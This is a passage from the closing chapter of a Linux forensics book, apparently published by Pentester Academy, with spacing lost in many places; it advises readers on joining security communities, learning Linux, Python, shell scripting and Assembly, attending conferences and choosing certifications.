A good starting place might be a local DEFCON group. The list of groups (namedaccording to phone area codes) can be found at https://www.defcon.org/html/defcon-groups/dc-groups-index.html. If you live in a large city, youmight find that there is aDEFCON group in your area.What if you don’t live in a big city? E-mail the contactpeoplefromsomenearbygroupsandaskiftheyknowofanythinggoingoninyourarea,especiallyanythingrelatedtoforensics.
Localmeetings aregreat.Youcanmeet like-mindedpeople, andoften suchmeetingscan be fun. The problem with these meetings is that they tend to be infrequent. Evenmonthlymeetings are not enough interactionwith thebigger community.This iswhereonlinecommunitiescanbeextremelybeneficial.Whenyoujoinanonlinecommunity,you
haveaccesstomanyexpertsaroundtheworld,notjustpeoplewholivenearby.
A great online community to become a part of is the one at Pentester Academy(http://pentesteracademy.com). Pentester Academy goes beyond a couple of discussionforums by providing downloads related to this book and others published by theirpublicationbranch,authorinteraction,andagrowinglibraryofcourses.AnotherplusofPentesterAcademyisthatitisnotnarrowlyfocusedonthesubfieldofforensics.
If you areonly looking for aplace tohave forensicsdiscussions, youmight considergivingComputerForensicsWorld(http://computerforensicsworld.com)atry.Theyofferanumber of discussion forums.There is also a computer forensics community onReddit(http://reddit.com/r/computerforensics).
LEARNINGMOREHasthisbookand/orafewLinuxforensicsinvestigationsinspiredyoutolearnmore?Youcan never go wrong learning more about the fundamentals. Here is my list offundamentalseveryforensicspersonshouldknow:
Linux–thisistheplacefordoingforensics,evenifthesubjectisnotrunningLinuxPython–thishasbecomethedefactostandardforinformationsecuritypeopleShellscripting–sometimesPythonisoverkillorhastoomuchoverheadAssembly–agoodunderstandingofAssemblyhelpsyouunderstandeverything
What is the bestway to learnLinux?Use it.Really use it.Run it every day as yourprimaryoperating system.Donot just run a liveLinuxdistributionoccasionally. InstallLinuxonyourlaptop.YouwillneverlearnaboutLinuxadministrationfromaliveLinuxdistribution. Personally, I would stay away from a forensics-specific distribution, likeSIFT.Youwillbemuchbetteroff in the longruninstallingastandardversionofLinuxandthenaddingyourtools.Ifyouarenotsurewhattouse,somememberoftheUbuntufamily is agoodchoice as there is a large community towhich to turnwhenyouwantsupport.If,afterrunningLinuxforafewyears,youdecideyoureallywanttolearnLinuxonadeeperlevel,considerinstallingGentooLinux(http://gentoo.org)onsomethingotherthan your forensicsworkstation.Gentoo is a source-based distribution, and installing itcanbesimultaneouslyeducationalandextremelyfrustrating.
AswithLinux, thebestwaytolearnPythonis toreallyuseit.TherearemanybooksavailablethatclaimtoteachyouPython.ThefirstthingyoushouldrealizeisthatPythoncan be used as a scripting language or as a programming language.Most of the booksavailable treat Python as a programming language. What I mean by programminglanguage is a language forwriting largecomputerprograms (sayawordprocessoror agame).Inmyopinion,thereareotherlanguagesthatarebettersuitedforsuchtasks.
TolearnPythonscriptingrequiresaveryhands-onapproach.Thisisexactlywhatyouwill find in the Python course at Pentester Academy(http://www.pentesteracademy.com/course?id=1). Some might question thisrecommendation, given that this book is published by Pentester Academy. I have been
recommendingthiscourselongbeforeIproducedmyfirstvideoforPentesterAcademyorthere was even a notion of this book, however. Some other good resources includehttp://learnpythonthehardway.org, http://www.codecademy.com/en/tracks/python, andhttp://learnpython.org.
As much as I might like Python, there are times when shell scripting is moreappropriate. In general, when you primarily want to run some programs and/or do notneedtodoalotofcalculations,ashellscriptcanbeagoodchoice.Someonlineresourcesfor learning shell scripting include http://linuxcommand.org, http://linuxconfig.org/bash-scripting-tutorial,andhttp://tldp.org/HOWTO/Bash-Prog-Intro-HOWTO.html.TwobooksonshellscriptingthatIwouldrecommendareWickedCoolShellScriptsbyDaveTaylor(2nd edition scheduled for September 2015 publication) andClassic Shell Scripting byArnoldRobinsandNelsonH.F.Beebe.Thelatterwaspublishedin2005butisstilloneofthebestbooksavailableonthistopic.
Why learn Assembly? A firm grasp of Assembly helps a person understand howcomputersworkatthelowestlevel.Assemblyistocomputersciencewhatcalculusistomathematicsandphysics.Justasknowingcalculusallowsyoutoinstantlymakesenseofeverythingfromyourhighschoolphysicsclass,learningAssemblywillmakewhatgoesonbehindthesceneswithhigh-levelprogramminglanguages(C,C++,etc.)crystalclear.
PentesterAcademyofferstwocoursesonAssemblyandshellcoding.Oneisfor32-bitsystemsand theother is for64-bitoperatingsystems.The32-bit and64-bit coursesareavailable at http://www.pentesteracademy.com/course?id=3 andhttp://www.pentesteracademy.com/course?id=7, respectively. Both of these courses willprovideyouwithabasicunderstandingofAssemblyandgowellbeyondwhathasbeencoveredinthisbook.
If you want to delve deeper into Assembly and explore topics not covered in thePentester Academy books mentioned above, you might enjoy Modern X86 AssemblyLanguageProgrammingbyDanielKusswurm.ThisbookcoversmanytopicsthatarenotcoveredbythePentesterAcademycourses(asthesecoursesarefocusedonthingsusedinshellcodingandreverseengineeringmalware).Theadditionaltopicsincludeitemssuchasusing floating-point registers and Advanced Vector Extensions (AVX) found in newprocessors.
CONGREGATEBeingpartofvibrantlocalandonlinecommunitiesisagreatthing.Nothingbeatsagreatconference,however.Manyof theresearchprojects Ihavedone in thepasthavebeenadirect resultofpeople Ihavemetanddiscussions Ihavehadat conferencesaround theworld. Conferences are a great place to network andmeet people with complementaryskillsetsandareasofexpertise.
A good starter list of forensics conferences can be found athttp://forensicswiki.org/wiki/Upcoming_events#Conferences. Forensics Magazine listssomeconferencesaswellathttp://www.forensicmag.com/events.Ihavenotfoundagoodmasterlistfordigitalforensicsconferences.YoumightwishtotryafewGooglesearches
tolocateconferencesdedicatedtoforensics.
There are many excellent information security conferences out there that offersomething for people interested in forensics.My two favorite places to find conferencelistingsareConciseCourses(http://concise-courses.com/security)andSECurityOrganizerandReporterExchange (http://secore.info). SECore offers a call for papers listingwithCFP closing dates for various conferences which can be handy if you have somethingexcitingtosharewithothers.
Nowthatyouhavefoundafewconferencestoattend,whatshouldyoudowhileyouarethere? Participate! If there is a forensics competition, and you have the time, considercompeting.Youmightnotwin,butyouarevirtuallyguaranteedtolearnalot.Oftenthereare people who will offer a little coaching for beginners in these competitions. Askquestions.Do not be afraid to talk to conference presenters.With very few exceptions,mostareapproachableandhappytotalkmoreabouttheirresearch.
Intentionallymeetnewpeople.Evenifyoutraveledtoaconferencewithagroup,findsomeoneyoudonotknowwithwhomtohaveamealat theconference.Overcomeanynaturaltendenciestowardintroversion.Ihaveattendedalotofconferences.Ihaveyettohave a negative outcome from introducing myself and sitting with someone new overlunch. If the conference offers any mixers or networking events, attend them if at allpossible.Itdoesnottakelongtobuildanetworkofpeoplewhomyoucanleverageinafutureinvestigation.
Nowforthehardestthingtodoatconferences:share.Manypeoplefalselyassumetheyhavenothingworthsharingbecausetheyarenewtoinformationsecurityand/orforensics.Everyoneisanexpertinsomething.Findanareayouenjoyandbecomeanexpertinthatarea. Share your expertise with others. You will quickly find that explaining things toothersenrichesyourownunderstanding.
Submitting a talk to a conference can be intimidating. Everyone gets rejected fromconferences. The key is not to take it personally. A rejected talk may be more of anindicatorofpoorfitwithathemeorothertalksofferedthanareflectionofthequalityofyoursubmission.Manyconferenceswillgiveyoufeedbackthatincludessuggestionsforfuturesubmissions.
Regional conferences, such asB-sides, can be a good place to start your career as aconferencepresenter.I’mnotsayingdonotsubmittothebigconferenceslikeDEFCON.Ifyoufeelcomfortableaddressinga fewthousandpeople foryourveryfirstconferencepresentation,thengorightahead.Ifyoufindpublicspeakingabitfrightening,youmightwanttostartwithaconferencesmallenoughthatyouwillhavelessthanahundredpeopleintheroomduringyourtalk.
CERTIFYGenerally speaking, certifications can help you get a job. This is especially true forindividuals just getting started in a career. Unfortunately, many of the recognizedcertifications require a certain level of experience that those just startingout donot yet
possess. The situation is even worse in the forensics field as some certificationorganizations require active full-time employmentwith a government entity. To furthercomplicatethings,thereisnouniversallyacceptedcertificationindigitalforensics.
Inthebroaderfieldofinformationsecurity,theCertifiedInformationSystemsSecurityProfessional (CISSP) from the International Information System Security CertificationConsortium(ISC)2 is considered to be the standard certification all practitioners shouldhold in many countries, including the United States. (ISC)2 offers a Certified CyberForensics Professional (CCFP) certification. Unlike the CISSP, the CCFP is notconsideredessentialbymanyorganizations.LiketheCISSP,ifyouwanttobeaCCFPbutyou lack experience, you can take the test and become an Associate of (ISC)2 who isgrantedthecertificationlaterafteryouhaveobtainedtherequiredexperience.
Many of the forensics certifications that are not tied to government employment areissuedbyvendors.GiventheopensourcenatureofLinux,certificationsspecifictoLinuxforensicsappeartobenon-existentatthistime.Thenetofallofthisisthatyoushouldbecautiousaboutspendingmoneyonforensicscertificationsunlessyouknowtheywillberequiredforaspecificjob.
SUMMARYWehavecoveredalotofgroundinthisbook.Ihopeyouhaveenjoyedthejourney.Wehave laid a foundation that should help you perform investigations of Linux systems.WhatmaynotbeimmediatelyapparentisthatbylearninghowtodoforensicsinLinux,youhavealsolearnedaconsiderableamountabouthowtoinvestigateWindowssystemsonaLinux-basedforensicsworkstationaswell.Thatisthesubjectforanotherbook.Untilthen,solongfornow,andenjoyyourLinuxinvestigations.